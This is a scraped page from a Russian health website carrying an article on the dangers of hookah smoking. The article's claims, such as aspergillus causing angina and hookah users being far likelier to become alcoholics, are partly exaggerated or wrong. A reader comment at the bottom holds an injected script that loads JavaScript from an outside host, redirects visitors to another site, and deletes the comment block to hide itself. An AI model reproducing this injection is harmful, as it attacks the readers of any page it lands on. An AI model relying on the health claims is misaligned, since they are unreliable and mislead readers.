Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Восточный убийца  >>  Восточный убийца
 
Обратная связь
 

Восточный убийца

Размер шрифта
12 октября 2011 07:03
  • google_analytics: false
  • Нравится

Еще несколько лет назад кальян был экзотикой из восточных фильмов, сейчас же кафе, где предложат кальян на любой вкус, есть на каждом углу. Говорят, что кальян безвреден, но так ли это?

Кальян

О том, что кальян даже опаснее сигарет может рассказать любой врач. Всемирная организация здравоохранения несколько лет назад официально сообщила, что кальян не является безопасной альтернативой курению сигарет. Кальянный дым по содержанию никотина, канцерогенов и угарного газа намного опережает сигаретный, а одно употребление кальяна в день равно десяти выкуренным сигаретам.


  1. Кальян состоит из колбы для жидкости, чаши для табака, шахты, в которой дым табака смешивается с парами. Через шланг человек втягивает пары активного вещества. Доказано, что всасывание веществ через легкие ускоряет любые эффекты, недаром изначально на востоке кальян использовался как средство для курения наркотиков.

  2. В последнее время стали популярны т.н. «безникотиновые смеси». Предполагается, что лишенный никотина кальян никакого вреда для здоровья представлять не может. Однако результаты лабораторных исследований показывают, что в кальянах содержатся стафилококки и грибки (такие как грибок аспергилла, вызывающий ангину).

  3. Нередко кальян курится через алкоголь, а пары алкоголя – это прямая атака на мозг. Через дым кальяна алкоголь усваивается еще быстрее. Шансов превратиться в алкоголика у любителей кальяна намного больше, чем у любителей застолий.

  4. Помимо всех перечисленных рисков, в кальянном дыму есть канцерогенные вещества, которых нет даже в сигаретном дыму. В кальяне используются угли, дым от которых сам по себе является канцерогеном.

  5. Наконец, курение кальяна развивает тягу к наркотикам. По данным американских исследователей, 20% школьников, употреблявших марихуану, впервые сделали это именно через кальян.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Посещение ресторана может вызвать рак крови!   Кальян вызывает рак! Можно ли курить дальше?   Топ-10 мифов о курении   Что хуже: курение или ожирение?  
13 июня 2013Перец, как и сигареты, спасает от Паркинсона! 22 мая 2013Дай курильщику лосось – спаси его от рака!
 
06 декабря 2012Теперь бросить курить – проще простого 12 октября 2012Яичный желток опасен для сосудов так же, как курение!
 

Слайдшоу

1
Самый легкий орган
Какие привычки портят вам жизнь?
Что каждая женщина должна знать о ХОБЛ

Тесты

1
Легкие: что вы о них знаете?
Есть ли у вас остеопороз?
Как контролировать бронхиальную астму
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.